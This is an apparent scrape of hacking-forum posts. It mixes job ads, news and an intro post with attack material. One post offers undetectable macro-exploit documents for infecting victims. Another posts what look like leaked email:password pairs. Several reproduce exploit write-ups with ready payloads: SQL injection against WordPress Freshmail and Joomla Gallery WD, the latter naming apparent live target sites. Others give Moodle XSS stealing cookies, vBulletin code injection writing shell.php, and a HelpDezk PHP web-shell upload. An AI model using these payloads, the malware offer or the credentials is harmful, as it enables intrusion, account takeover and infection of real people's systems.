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  1. lets keep words very short just finished a very simple exploit project and will be giving all member who post on here ( and pm me with direct url of their file ) will get a fully undetected doc exploited document. victims need to Enable Content to be able to get infected. post and pm method is to avoid leechers, sorry. Post here you need and pm me your url. i will respond to your pm when i see your post on thread. Lets rock guys. Scan URL: Scan4You.net - Online Anonymous Virus and Malware Scan PLEASE MAKE SURE YOUR FILE.EXE IS Fully Undetectable (FUD) BEFORE SENDING ME URL. PS; if i did not reply your pm in time, you can chat me on ym,jabber Yahoo IM: ratsetup247 Jabber : ratsetup247@exploit.im
  2. Salut.Da-ti like daca vreti mai multe conturi.Daca nu mai vreti sa asteptati pana la urmatorul post , vand si conturi de Origin(Depinde ce jocuri are contu) counster-strike@hotmail.com: pokereis0r (fara spatiu ca daca lasam asa era ) ilkka.arvio@gmail.com:1antasahtl Multumesc pentru suport!:X:X:X
  3. ------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source
  4. download here : is my first post Scan info : reFUD.me - Results
  5. In Bucuresti, cei interesati pot aplica pentru un post de PHP Developer. Candidatul ideal trebuie sa aiba cel putin un an de experienta in domeniu, experienta extensiva in designul si dezvoltarea aplicatiilor web cu PHP, Zend Framework, HTML, CSS, Java Script si AJAX. De asemenea, sunt necesare cunostinte de operare ale unor baze de date precum MySQL si MSSQL. Avantaj la angajare au candidatii care mai au si cunostinte de Memcache, Gearman, RabbitMQ, Symfony 2, Web Services si Apache. Viitorul angajat se va ocupa de designul si de implementarea mai multor aplicatii pe diverse platforme, potrivit anuntului de angajare postat pe un site de recrutare. Tot un post de PHP Developer este disponibil si in Iasi. Tot aici, se cauta o casiera pentru showroom, care sa aiba cel putin 6 luni de experienta pe un post similar si studii medii. Persoanele care vor sa aplice pentru acest post trebuie s? aibe cunostinte minime ale pachetului Microsoft Office, de contabilitate primara si de facturare. Iar in Craiova, eMag angajeaza Senior PHP Developer. eMag face angajari in Bucuresti, Iasi si Craiova. Ce salarii ofera cel mai mare retailer online din Romania Cariere - eMAG.ro
  6. ###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search # ~ Demo ~ # $> http://www.cnct.tg/ http://www.nswiop.nsw.edu.au/ http://cnmect.licee.edu.ro/ #EOF Source
  7. ###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search #EOF Source
  8. Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php[/url] Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: [url]https://moodle.org/mod/forum/discuss.php?d=307383[/url] CVE ID: CVE-2015-2269 CVE URL: [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269[/url] 09.02.2015 -- Random Glossary Entry --------------------- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST [url]http://WEB/blog/index.php[/url] HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script> Source
  9. ################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ################################################################################################################# Remote Code Injection: +++++++++++++++++++++++++ 1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat] 2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL: http://black-hg.org/cc/visitormessage.php?do=message [Post data] message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]" 5- Open hackbar and tamper it with taper data: referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request. ################################################################################################################ Source
  10. # Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities # Google Dork: "intext: helpdezk-community-1.0.1" # Date: 26-2-2015 # Exploit Author: Dennis Veninga # Vendor Homepage: http://www.helpdezk.org/ # Vendor contacted: 26-2-2015 # Version: 1.0.1 # Tested on: Firefox 36 & Chrome 38 / W8.1-x64 HelpDezk -> Version: 1.0.1 Type: Multiple Critical Vulnerabilities Severity: Critical Info Exploit: Different exploits making it possible to take over the website/server - Arbitrary File Upload - Remote Command Execution - User Information Disclosure ############################################### Arbitrary File Upload, 2 ways -> 1. Direct Access: http://{target}/helpdezk/admin/logos/upload ######### 2. POST: http://localhost/helpdezk/admin/logos/upload After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami CONTENT: -----------------------------14463264629720\r\n Content-Disposition: form-data; name="file"; filename="shell.php"\r\n Content-Type: application/octet-stream\r\n \r\n <?php\r\n if(isset($_REQUEST['cmd'])){\r\n $cmd = ($_REQUEST["cmd"]);\r\n system($cmd);\r\n echo "</pre>$cmd<pre>";\r\n die;\r\n }\r\n ?>\r\n -----------------------------14463264629720--\r\n ############################################### Remote Command Execution, you see an white page with 'ok' when SUCCESS! Delete a download POST: http://localhost/helpdezk/admin/downloads/delete CONTENT: id={IDNUMBER} Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again* POST: http://{localhost}/helpdezk/admin/modules/deactivate CONTENT: id=1 id=1 = Admin id=2 = Dashboard id=3 = HelpDezk ############################################### User Information Disclosure NOTE: Stop javascript, else it will quickly show all info and returns you to the login page. POST: http://{target}/helpdezk/admin/relPessoa/table_json/ CONTENT: typeperson=ALL ############################################### I'm sure I didn't find everything, but maybe time to fix those huge issues first! Source
  11. How can post in RST Market? I do not see ant Post New thread option when i visit RST Market.
  12. The blog post of today is a bit different than usual, as you can read the full post on the Panda Security blog. Read it here: Yet another ransomware variant In this post I'm simply adding some additional information and repeating the most important points. So, there's yet another ransomware variant on the loose. You may call this one Chuingam (chewing gum?) ransomware or Xwin ransomware - pointing to respectively the file with this string 'Chuingam' dropped, or in the latter case the folder on C:\ it creates. Or just another (skiddie) Generic Ransomware. In the blog post above, I discuss the methodology to encrypt files it uses and how it creates your own personal key, as well as the ransom message and how to recover files (if you're lucky & fast enough). pgp.exe (PGP) is used to generate the public RSA key. Since pgp.exe requires the RAR password, this is temporarily stored in the file "filepas.tmp" - which is overwritten and deleted, so no chance to recover this file. As a note; it will (try to) encrypt any and all files with the following extensions: jpg, jpeg, doc, txt, pdf, tif, dbf, eps, psd, cdr, tst, MBD, xml, xls, dwg, mdf, mdb, zip, rar, cdx, docx, wps, rtf, 1CD, 4db, 4dd, adp, ADP, xld, wdb, str, pdm, itdb, pst, ptx, dxg, ppt, pptx If you've been infected with this ransomware, best thing to do is to either restore from a backup or try to restore previous files (also known as shadow copies). For additional information in regards to this specific ransomware, refer to: Yet another ransomware variant For any further background information on ransomware or further prevention & disinfection advice, I refer to my Q&A on ransomware. IOCs Hashes (SHA1) 88039ecb68749ea7d713e4cf9950ffb2947f7683 7e1dd704684f01530307f81bbdc15fe266ffd8db Domains/IPs corplawersp.com Source
  13. The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news. In one post, the Pope was quoted on UPI's Twitter feed as saying that "World War III has begun". Meanwhile, the New York Post's account said that hostilities had broken out between the United States and China. It is the latest hack of a high-profile social media account, four days after US military command was compromised. UPI, which is based in Washington, confirmed in a statement that both its Twitter account and news website had been hacked. Six fake headlines were posted on its Twitter account and a breaking news banner was added to a fake story about the Federal Reserve on its homepage, the statement added. A tweet on the New York Post's account said the USS George Washington, an aircraft carrier, was "engaged in active combat" against Chinese warships in the South China Sea. A Pentagon official said the tweet about hostilities with China was "not true", AFP reports. The tweets have all since been deleted. The New York Post says it is investigating the hack. It comes just days after US President Barack Obama unveiled proposals to strengthen cyber security laws after a spate of attacks on high-profile US targets, including the Pentagon Twitter feed and Sony Pictures. The Twitter account of the US military command was suspended last Monday following an attack by hackers claiming to support Islamic State. In November hackers also released reams of confidential data stolen from Sony Pictures, and in recent years cyber criminals have attacked other US companies such as Home Depot and Target. A number of media organisations, including AFP and the BBC, have also been subjected to cyber attacks over the past two years. Source
  14. Am 16 ani, sunt pe clasa a9a la mate-info intensiv info(sincer nu prea imi place matematica, da trag sa inteleg cat de cat) si am intrat in aceasta comunitate, deoarece sunt atras de programare. De site am aflat de la un prieten si am zis ca merita sa incerc sa vad poate gasesc si eu niste chesti interesante care sa-mi dezvolte abilitatile. Cunosc pascal, python si foarte putin html. Fac parte din echipa de olimpici la info a liceului:D
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